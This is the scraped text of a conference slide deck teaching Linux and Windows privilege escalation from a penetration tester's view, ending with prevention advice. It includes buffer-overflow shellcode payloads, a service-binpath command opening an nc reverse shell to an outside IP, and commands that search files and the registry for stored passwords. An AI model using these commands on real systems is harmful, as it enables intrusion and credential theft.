SlideShare una empresa de Scribd logo

How fun of privilege escalation Red Pill2017

Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP

How fun of privilege escalation Red Pill2017 Organized by 2600 Thailand

Educación
1 de 123
Descargar para leer sin conexión
How Fun of Privilege Escalation Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
# whoami <Name> Ammarit Thongthua Khay Shellcodenoobx </Name> <Job> Risk Advisory Manager, Deloitte Thailand Penetration Tester Security Consultant </Job> <Education> B.Eng Com, ABAC M.Sci Cyber Security and Info Assurance, Mahidol Unv. CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+ </Education>
Pre Exploitation Exploitation Post Exploitation # “Privilege Escalation” Information gathering Scanning Enumeration Remote Exploitation - Gain system access - Gain information - Denial of services - Privilege Escalation Local Exploitation - Bypass Restriction - Privilege Escalation Gathering Sensitive Info Manage System/Service Pivoting Windows
# “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users Root Sudoer UsersService Users Service Users Windows Unix
# “Privilege Escalation” • Vertical privilege escalation -> Gain higher privilege • Horizontal privilege escalation -> Gain access with other accounts Users Service Users john Apache, mysql Users john Root
# “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users UsersService Users Windows Anonymous FTP Webshell LocalExploit Vul. Service Exp
# “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
# “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
# Remote and Local Exploitation Network TCP/UDP TCP: 20/21 TCP: 22 TCP: 23 TCP: 25 UDP: 53 TCP: 80 UDP: 161 TCP: 443 TCP: 445 TCP/UDP : 514 TCP: 1433 TCP: 1521 TCP: 3306 TCP: 3389 TCP: XXXX • Remote Exploitation
# Remote and Local Exploitation Race Condition Buffer Overflow Heap Overflow Kernel Exploit Evasion DLL Injection DLL Hijacking Hot Potato Mis-config Service, file permission
# Remote and Local Exploitation Root
# “Privilege Escalation” • Access to restricted resources/file • System Credential • /etc/shadow • SAM file • Registry • Configuration files • Encryption Key • System memory • Run privilege commands , set system configuration and Installations • Pivoting • Maintain access , Backdoor • Key logger, Rootkit, Dump traffic • Many more..
# “Privilege Escalation”
# “Privilege Escalation”
# “Privilege Escalation”
# “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH • Shell Escape(restrict shell ,chroot) • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • Sudoer • System Misconfiguration • Kernel Exploitation • Remote Exploitation by local host
# “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users
# “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users FILE_SERVER #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
# “Privilege Escalation” Ways for Linux • Weak password of high privilege users Maybe use the password similar to username Maybe use weak password root Password P@ssw0rd ….
# “Privilege Escalation” Ways for Linux • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH
# “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337
# “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID • Can perform Overflow • Use Static Libc. (Nice to have)
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID list="$(find / -perm -4000 -o -perm -2000)";for i in $list; do ls -al $i; done ls –R / | grep “wsr” | grep “root”
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Can perform Overflow
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
#objdump –d vul_app | grep “jmp” | grep “esp” # ROPgadget --binary vul_app --only "jmp“ | grep esp 0x08049f0f : jmp %esp # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Shellcode system(“/bin//sh”) Shellcode= “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80” jmp %esp 0x08049f0f esp
#python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app # “Privilege Escalation” Ways for Linux Privilege is dropped
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users #nano /tmp/sh.c
# “Privilege Escalation” Ways for Linux #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx74x6dx70x89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app tmp • Vulnerable Applications / Programs / Services use high privilege users
# “Privilege Escalation” Ways for Linux
# “Privilege Escalation” Ways for Linux The real life is not easy !!!! • Canary (Buffer overflow detection) • Executable Stack Prevention (NX , DEP) • Address Space Layout Randomization (ASLR)
# “Privilege Escalation” Ways for Linux But It’s possible to bypass !!! • Canary (Buffer overflow detection) -> Canary Repair • Executable Stack Prevention (NX , DEP) -> Ret-2-Libc , ROP • Address Space Layout Randomization (ASLR) -> Static Lib, App Warp Up https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c- 82b1d063aa6b&v=&b=&from_search=1
# “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users /etc/cron.d /etc/crontab /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly # ls -Ral /etc/cron*
# “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users Reverse shell
# “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
# “Privilege Escalation” Ways for Linux
# “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
# “Privilege Escalation” Ways for Linux • Sudoer (Compromised user we got maybe in the sudoer list)
# “Privilege Escalation” Ways for Linux • System Misconfiguration
# “Privilege Escalation” Ways for Linux • Kernel Exploitation Ex: DirtyCOW
# “Privilege Escalation” Ways for Linux • Kernel Exploitation (Trick) Ex: Linux version 2.6.9-89.EL • Compile exploit on the target system on target like environment • Metasploitable is good exploit compile environment
# “Privilege Escalation” Ways for Linux #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D • Remote Exploitation by local host 127.0.0.1
# “Privilege Escalation” Ways for Linux • [Linux Privilege Escalation Scripts and Commands] Ref : https://netsec.ws/?p=309 LinEnum http://www.rebootuser.com/?p=1758 LinuxPrivChecker http://www.securitysift.com/download/linuxprivchecker.py Basic-linux-privilege-escalation https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
• LinuxPrivChecker # “Privilege Escalation” Ways for Linux
• LinuxPrivChecker # “Privilege Escalation” Ways for Linux
# “Privilege Escalation” Ways for Linux • Case Study :
# “Privilege Escalation” Ways for Linux • Case Study :
# “Privilege Escalation” Ways for Linux • Case Study : But no exploit detail in exploit-db !!!
# “Privilege Escalation” Ways for Linux • Case Study :
# “Privilege Escalation” Ways for Linux • Case Study :
Low Priv Other Unix Servers Dirty Cow Default password Crack root pass root Bypass Restrict Shell CMC # “Privilege Escalation” Ways for Linux • Case Study :
# “Privilege Escalation” Ways for Windows • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file and Registry • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • System Misconfiguration • Kernel Exploitation • Pass-the-hash • DLL Injection • DLL Hijacking • Remote Exploitation by local host • Hotpotato • Many more…
# Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users
# Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users Credit : Worawit Wangwarunyoo (sleepya)
• Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
• Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
# Remote Exploit to escalate privilege • Exploit to vulnerability of the service misconfigure running with high privilege users WebShell
# “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command
# “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command “It’s not always easy in the real life”
• PS Migration # “Privilege Escalation” Ways for Windows
• PS Migration # “Privilege Escalation” Ways for Windows
• PS Migration # “Privilege Escalation” Ways for Windows
# Remote Exploit to escalate privilege • Credential store in files findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini Pass PASS PWD
c:sysprep.inf c:sysprepsysprep.xml c:unattend.xml %WINDIR%PantherUnattendUnattended.xml %WINDIR%PantherUnattended.xml dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b dir c: /s /b | findstr /si *vnc.ini # Remote Exploit to escalate privilege • Credential store in files
# Remote Exploit to escalate privilege https://adsecurity.org/?p=2288 (<DOMAIN>SYSVOL<DOMAIN>Policies)• Credential store in DC Policy Script files
# Remote Exploit to escalate privilege • Credential store in registry # VNC reg query "HKCUSoftwareORLWinVNC3Password" # Windows autologin reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon" # SNMP Paramters reg query "HKLMSYSTEMCurrentControlSetServicesSNMP" # Putty reg query "HKCUSoftwareSimonTathamPuTTYSessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
# Remote Exploit to escalate privilege • Credential store in registry
# Remote Exploit to escalate privilege
# Remote Exploit to escalate privilege http://www.labofapenetrationtester.com/2015/05/ dumping-passwords-in-plain-on-windows-8-1.html Windows Server 2012
# Remote Exploit to escalate privilege
# Remote Exploit to escalate privilege • Token Impersonation https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
• Insecure Services permission # “Privilege Escalation” Ways for Windows
• Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
• Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows
• Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows sc config upnphost binpath= "C:Inetpubnc.exe -nv 10.11.0.110 5555 -e C:WINDOWSSystem32cmd.exe"
• Insecure Services permission by msf # “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
# “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths
# “Privilege Escalation” Ways for Windows • Unquoted Service Paths
# “Privilege Escalation” Ways for Windows • Unquoted Service Paths
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
# “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
# “Privilege Escalation” Ways for Windows GGEZ • Unquote path + MS15-067
• DLL Hijacking # “Privilege Escalation” Ways for Windows https://msitpros.com/?p=2012 The way that Windows loads DLLs then, is to search the following directories in this order: – The directory from which the application loaded – C:WindowsSystem32 – C:WindowsSystem – C:Windows – The current working directory – Directories in the system PATH environment variable – Directories in the user PATH environment variable https://www.gracefulsecurity.com/privesc-dll-hijacking/
• DLL Hijacking # “Privilege Escalation” Ways for Windows https://pentestlab.blog/2017/03/27/dll-hijacking/
# “Privilege Escalation” Ways for Windows • DLL Hijacking https://pentestlab.blog/2017/03/27/dll-hijacking/
https://pentestlab.blog/2017/03/27/dll-hijacking/ # “Privilege Escalation” Ways for Windows
https://pentestlab.blog/2017/03/27/dll-hijacking/ # “Privilege Escalation” Ways for Windows • DLL Hijacking
# “Privilege Escalation” Ways for Windows • Driver Exploitation
https://www.exploit-db.com/exploits/42665/ Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation• Driver Exploitation Example : # “Privilege Escalation” Ways for Windows
• HOT Potato # “Privilege Escalation” Ways for Windows
• HOT Potato # “Privilege Escalation” Ways for Windows Manual add user Use Hot Potato technique
# “Privilege Escalation” Ways for Windows • Pass-th-Hash
• Remote Exploit on the localhost # “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
# “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
• Local Exploit to escalate privilege # “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows • Local Exploit to escalate privilege
# “Privilege Escalation” Ways for Windows
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 pip install pyinstaller # “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows DEMO Noobx_shell
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
# “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
# “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
# “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
# “Privilege Escalation” on other devices • Mobile Phone • Root or Jailbreak • DirtyCow • Network Device • Remote Exploit • EXTRABACON exploit • Backdooring • ROM0 • Password Crack of high privilege level account
# “Privilege Escalation” on other devices
# Prevention • Secure by design • System hardening • Disable unused service • Disable/remove unused programs , users or backup files • Installed endpoint security • Strong Access Control and Authentication • Least Privilege • Patch Management • Security Assessment • Vulnerability Assessment • Penetration Testing
Q & A
Thank You Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
• http://www.fuzzysecurity.com/tutorials/16.html • https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html • https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post- Exploitation.md • http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/ • https://pentestlab.blog/2017/04/04/dll-injection # References

Recomendados

Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop
Hossam .M Hamed
 
Level Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege EscalationLevel Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege Escalation
jakx_
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Security and Linux Security
Security and Linux SecuritySecurity and Linux Security
Security and Linux Security
Rizky Ariestiyansyah
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static Analysis
Hossein Yavari
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Teymur Kheirkhabarov
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
Teymur Kheirkhabarov
 

Recomendados

Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop
Hossam .M Hamed
 
Level Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege EscalationLevel Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege Escalation
jakx_
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Security and Linux Security
Security and Linux SecuritySecurity and Linux Security
Security and Linux Security
Rizky Ariestiyansyah
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static Analysis
Hossein Yavari
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Teymur Kheirkhabarov
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
Teymur Kheirkhabarov
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv Shah
OWASP Delhi
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token Manipulation
Justin Bui
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
Thick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfThick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdf
SouvikRoy114738
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
Anurag Srivastava
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Sergey Soldatov
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalation
SongchaiDuangpan
 
Windows Privilege Escalation
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege Escalation
Riyaz Walikar
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
Sqrrl
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
Will Schroeder
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
Michael Gough
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacks
Michael Gough
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get it
Benjamin Delpy
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
Sunny Neo
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
Nikhil Mittal
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 

Más contenido relacionado

La actualidad más candente

Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 

La actualidad más candente (20)

Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv Shah
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token Manipulation
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
Thick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfThick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdf
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalation
 
Windows Privilege Escalation
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege Escalation
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacks
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get it
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 

Similar a How fun of privilege escalation Red Pill2017

Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
Xavier Ashe
 
Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok
Docker, Inc.
 
Sensu and Sensibility - Puppetconf 2014
Sensu and Sensibility - Puppetconf 2014Sensu and Sensibility - Puppetconf 2014
Sensu and Sensibility - Puppetconf 2014
Tomas Doran
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
Yossi Sassi
 
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON
 

Similar a How fun of privilege escalation Red Pill2017 (20)

RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
Multi-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesMulti-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation Strategies
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
 
Windows privilege escalation
Windows privilege escalationWindows privilege escalation
Windows privilege escalation
 
Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Apache Directory and the OSGi Service Platform - Enrique Rodriguez, PMC Membe...
Apache Directory and the OSGi Service Platform - Enrique Rodriguez, PMC Membe...Apache Directory and the OSGi Service Platform - Enrique Rodriguez, PMC Membe...
Apache Directory and the OSGi Service Platform - Enrique Rodriguez, PMC Membe...
 
WTF my container just spawned a shell!
WTF my container just spawned a shell!WTF my container just spawned a shell!
WTF my container just spawned a shell!
 
Sensu and Sensibility - Puppetconf 2014
Sensu and Sensibility - Puppetconf 2014Sensu and Sensibility - Puppetconf 2014
Sensu and Sensibility - Puppetconf 2014
 
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
 
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
